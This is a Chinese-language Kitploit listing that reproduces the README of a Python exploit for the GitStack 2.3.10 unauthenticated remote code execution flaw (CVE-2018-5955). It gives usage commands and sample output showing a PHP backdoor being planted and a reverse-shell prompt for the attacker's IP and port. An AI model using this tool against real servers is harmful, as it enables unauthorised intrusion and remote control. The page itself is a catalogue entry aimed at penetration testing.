Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-5955 — 针对 CVE-2018-5955 GitStack 2.3.10 未授权远程代码执行(RCE)的漏洞利用程序。 | Kitploit
工具/GitHubGitHub/mikethehash/cve-2018-5955
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubmikethehash/cve-2018-5955

CVE-2018-5955

针对 CVE-2018-5955 GitStack 2.3.10 未授权远程代码执行(RCE)的漏洞利用程序。

查看仓库
1031年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-5955

针对 CVE-2018-5955 GitStack 2.3.10 未认证远程代码执行(RCE)漏洞的利用程序

漏洞利用:GitStack 2.3.10 未认证远程代码执行

日期:18.01.2018

软件链接:https://gitstack.com/

漏洞利用作者:Kacper Szurek

原始漏洞利用:https://www.exploit-db.com/exploits/43777

网站:https://security.szurek.pl/

类别:远程

CVE:CVE-2018-5955

由 MikeTheHash 修改的 Exploit

日期:23.06.2023

新功能:交互式 RCE、操作系统检测、反弹 Shell 功能,已从 python2 移植到 python3

CVE:CVE-2018-5955

类别:远程

免责声明

我不对你的行为承担任何责任,因为我将其发布在 GitHub 上仅用于教育目的或经过认证和授权的渗透测试。

使用方法

安装依赖:

root@kitploit:~
pip install colorama

然后,你可以用以下命令运行:

root@kitploit:~
python3 exploit.py

功能

  • 操作系统检测
  • 反弹 Shell

操作系统检测:

在利用该 CVE 之后将检测操作系统,实际上会输出这样一行:"[*] OS: $operatingsystem"(如下所示)

root@kitploit:~
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----

你也可以输入 "os" 来查看操作系统类型。

反弹 Shell

要在目标上获得一个真正的反弹 Shell,你可以输入 "shell",然后按如下方式输入你的 IP 和监听端口:

root@kitploit:~
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE

黑客攻击愉快!

下载工具